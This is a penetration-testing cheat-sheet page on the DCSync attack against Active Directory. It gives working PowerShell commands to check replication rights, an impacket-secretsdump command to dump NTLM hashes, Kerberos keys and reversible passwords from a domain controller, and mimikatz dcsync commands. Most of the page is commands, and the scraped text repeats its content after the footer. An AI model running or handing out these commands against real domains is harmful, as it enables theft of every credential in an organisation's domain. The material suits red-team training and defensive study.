DCSync

About

DCSync is a post-exploitation technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR), which is normally used to synchronize data between Domain Controllers.

If an attacker obtains the appropriate replication privileges in Active Directory (such as Replicating Directory Changes All), they can impersonate a Domain Controller and request a targeted sync of sensitive directory data — including password hashes, Kerberos tickets, and user credentials — without replicating the entire domain.

This results in full credential compromise over the network, without touching LSASS or memory on a domain controller.

Checking Privs

Group Membership Check

PS C:\> Get-DomainUser -Identity songbird | select samaccountname,objectsid,memberof,useraccountcontrol | fl

Rights Check

PS C:\> $sid = "S-1-5-21-blahblahblah-1164"
PS C:\> Get-ObjectAcl "DC=militech,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Reversible Encryption Check

PS C:\> Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# OR
PS C:\> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Secretsdump

impacket-secretsdump -outputfile militech_hashes -just-dc MILITECH/songbird@13.13.13.13

Additional Parameters

-just-dc-ntlm - NTLM hashes only
-just-dc-user <USERNAME> - Extract data for certain user
-pwd-last-set - To see last time user changed password
-history - If we want to dump password history
-user-status - Check if user is disabled

Secretsdump would make few files each for each type of credentials:

Kerberos Tickets
NTLM Hashes
Cleartext Reversible Passwords (if option turned on, and because we are replicating DC, tool automaticly tooks also decryption keys and decrypt them)

Mimikatz

.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:MILITECH.LOCAL /user:MILITECH\administrator

PreviousDumping NextDPAPI Secrets

Last updated 1 month ago

About

This results in full credential compromise over the network, without touching LSASS or memory on a domain controller.

Checking Privs

Group Membership Check

PS C:\> Get-DomainUser -Identity songbird | select samaccountname,objectsid,memberof,useraccountcontrol | fl

Rights Check

PS C:\> $sid = "S-1-5-21-blahblahblah-1164"
PS C:\> Get-ObjectAcl "DC=militech,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Reversible Encryption Check

PS C:\> Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# OR
PS C:\> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Secretsdump

impacket-secretsdump -outputfile militech_hashes -just-dc MILITECH/songbird@13.13.13.13

Additional Parameters

-just-dc-ntlm - NTLM hashes only

-just-dc-user <USERNAME> - Extract data for certain user

-pwd-last-set - To see last time user changed password

-history - If we want to dump password history

-user-status - Check if user is disabled

Secretsdump would make few files each for each type of credentials:

Kerberos Tickets

NTLM Hashes

Cleartext Reversible Passwords (if option turned on, and because we are replicating DC, tool automaticly tooks also decryption keys and decrypt them)